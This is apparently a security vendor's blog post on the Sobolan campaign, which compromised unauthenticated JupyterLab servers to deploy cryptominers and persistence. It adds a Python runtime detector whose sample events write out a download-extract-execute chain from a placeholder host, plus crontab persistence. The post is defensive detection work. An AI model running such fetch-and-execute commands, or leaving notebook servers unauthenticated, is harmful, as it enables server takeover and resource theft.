Stopping Sobolan Malware with Aqua Runtime Protection

2025-03-11 ~1 min read blog.aquasec.com #security

⚡ TL;DR

Aqua Nautilus researchers have discovered a new attack campaign targeting interactive computing environments such as Jupyter Notebooks. The attack consists of multiple stages, beginning with the download of a compressed file from a remote server.

📝 Summary

Aqua Nautilus researchers have discovered a new attack campaign targeting interactive computing environments such as Jupyter Notebooks. The attack consists of multiple stages, beginning with the download of a compressed file from a remote server. Once the archive's contents are executed, the attacker deploys several malicious tools to exploit the server and establish persistence. This campaign poses a significant risk to cloud-native environments, as it enables unauthorized access and long-term control over compromised systems.

In this blog, we will outline the attack stages, discuss the potential risks, and provide recommendations to strengthen security and prevent exploitation.

Interactive computing environments, or notebook interfaces, are platforms designed for data scientists and programmers to write, execute, and analyze code interactively. There are many products available, including Jupyter Notebook, JupyterLab, Apache Zeppelin, Google Colab, Databricks Notebooks, and others. These environments are often reachable from the internet and require authentication to access data or execute code. However, a single misconfiguration, such as disabling authentication on an internet-facing server, can expose it to attackers; because a notebook exists to run arbitrary code, an unauthenticated instance hands anyone who finds it code execution on the host.

Figure 1: Sobolan campaign attack flow

The attackers gained initial access through an unauthenticated JupyterLab instance, allowing them to deploy malware and cryptominers. They first downloaded and extracted a compressed archive containing 13 malicious files, consisting of both binaries and shell scripts. Once executed, these scripts initiated multiple processes to establish persistence, hijack system resources for cryptomining, and evade detection (as shown in Figure 1).
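The chain above (notebook server, archive download, extraction, execution of the dropped scripts, persistence) is what a runtime detector has to recognise. The Python below is an added example written for this page, not Aqua's detection logic and not code from the Nautilus report: it scopes process-exec events to descendants of a notebook server and alerts once a download, an extraction and an execution from a scratch directory appear under the same server, escalating if a persistence mechanism is touched. The events, PIDs, the 203.0.113.10 address and the file names are constructed placeholders; `exposed_without_auth` is a command-line-only heuristic for the misconfiguration that gave the attackers initial access and is likewise an assumption of this example.

```python
"""Detect the notebook-to-download-to-execute chain over constructed exec events.

Added example for this page, not Aqua's detector. Input is a flat list of
process-exec records (pid, ppid, comm, cmdline) as an eBPF or auditd feed
would give you.
"""
import os
import re
import shlex
from dataclasses import dataclass

NOTEBOOK_SERVERS = {"jupyter-lab", "jupyter-notebook", "jupyter-server",
                    "jupyterhub-singleuser"}
SHELLS = {"sh", "bash", "dash", "zsh"}
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    comm: str
    cmdline: str


# Constructed sample telemetry: hypothetical PIDs, a TEST-NET-3 address and
# made-up file names. Only the shape mirrors the campaign's stages.
SAMPLE_EVENTS = [
    ProcEvent(1000, 1, "jupyter-lab",
              "jupyter-lab --ip=0.0.0.0 --port=8888 --NotebookApp.token=''"),
    ProcEvent(1200, 1000, "python3",
              "python3 -m ipykernel_launcher -f /root/.local/share/jupyter/runtime/kernel-1.json"),
    ProcEvent(1300, 1200, "sh", "sh -c 'curl -s http://203.0.113.10/pkg.tar.gz -o /tmp/pkg.tar.gz'"),
    ProcEvent(1301, 1200, "sh", "sh -c 'tar -xzf /tmp/pkg.tar.gz -C /tmp/.x'"),
    ProcEvent(1302, 1200, "sh", "sh -c 'chmod +x /tmp/.x/*.sh && /tmp/.x/run.sh'"),
    ProcEvent(1400, 1302, "crontab", "crontab -"),
    ProcEvent(1500, 1200, "sh", "sh -c 'pip install pandas'"),  # benign kernel child
    ProcEvent(2000, 1, "sh",  # same download, but not under a notebook server
              "sh -c 'curl -s https://example.invalid/u.tar.gz -o /tmp/u.tar.gz'"),
]


def simple_commands(cmdline):
    """Unwrap `sh -c '...'` and split on && || | ; (space-separated) into argv lists."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: fall back to a plain split
        argv = cmdline.split()
    if argv and os.path.basename(argv[0]) in SHELLS and "-c" in argv:
        i = argv.index("-c")
        return simple_commands(argv[i + 1]) if i + 1 < len(argv) else []
    out, cur = [], []
    for tok in argv:
        if tok in ("&&", "||", "|", ";", "&"):
            if cur:
                out.append(cur)
            cur = []
        elif tok.endswith(";") and len(tok) > 1:
            cur.append(tok[:-1])
            out.append(cur)
            cur = []
        else:
            cur.append(tok)
    if cur:
        out.append(cur)
    return out


def classify(argv):
    """Map one simple command to an attack stage, or None if it looks benign."""
    if not argv:
        return None
    prog = os.path.basename(argv[0])
    if prog in ("curl", "wget") and any(a.startswith(("http://", "https://")) for a in argv[1:]):
        return "download"
    if prog == "tar" and len(argv) > 1:
        opts = argv[1]
        if opts == "--extract" or (not opts.startswith("--") and "x" in opts.lstrip("-")):
            return "extract"
    if prog in ("unzip", "gunzip", "bunzip2", "unxz", "7z"):
        return "extract"
    if prog == "crontab" or (prog == "systemctl" and "enable" in argv) \
            or any(a.startswith(("/etc/cron", "/var/spool/cron")) for a in argv):
        return "persistence"
    if argv[0].startswith(SCRATCH_DIRS) or \
            (prog in SHELLS and len(argv) > 1 and argv[1].startswith(SCRATCH_DIRS)):
        return "exec_scratch"
    return None


def detect_chains(events):
    """Group stage hits by the notebook server they descend from; alert on a full chain."""
    by_pid = {e.pid: e for e in events}

    def server_root(e):  # nearest notebook-server ancestor, or None
        seen, cur = set(), e
        while cur.ppid in by_pid and cur.ppid not in seen:
            seen.add(cur.ppid)
            cur = by_pid[cur.ppid]
            if cur.comm in NOTEBOOK_SERVERS:
                return cur.pid
        return None

    chains = {}
    for e in events:
        root = server_root(e)
        if root is None:
            continue
        for argv in simple_commands(e.cmdline):
            stage = classify(argv)
            if stage:
                info = chains.setdefault(root, {"stages": set(), "evidence": []})
                info["stages"].add(stage)
                info["evidence"].append((e.pid, stage, " ".join(argv)))
    alerts = []
    for root, info in chains.items():
        if {"download", "exec_scratch"} <= info["stages"]:
            alerts.append({"server_pid": root,
                           "severity": "critical" if "persistence" in info["stages"] else "high",
                           "stages": sorted(info["stages"]),
                           "evidence": info["evidence"]})
    return alerts


def exposed_without_auth(server_cmdline):
    """Heuristic for the initial-access misconfiguration: bound to all interfaces with an
    empty token and no password on the command line. Config files can override this."""
    argv = shlex.split(server_cmdline)
    flat = " ".join(argv)
    bound_all = re.search(r"--(?:\w+\.)?ip[= ](?:0\.0\.0\.0|\*|::)(?:\s|$)", flat) is not None
    no_token = any(a.endswith(".token=") or a == "--token=" for a in argv)
    has_password = any(".password=" in a and not a.endswith(".password=") for a in argv)
    return bound_all and no_token and not has_password


if __name__ == "__main__":
    for alert in detect_chains(SAMPLE_EVENTS):
        print(alert["severity"], "server pid", alert["server_pid"], alert["stages"])
        for pid, stage, cmd in alert["evidence"]:
            print("  ", pid, stage, cmd)
```

Feed it real exec telemetry by building one `ProcEvent` per exec record; the ancestry walk is what keeps an `apt` or `pip` download elsewhere on the host from tripping the rule, and the separate `exposed_without_auth` check is worth running against the server's command line before any of this is needed, since a token set in `jupyter_server_config.py` will not show up there.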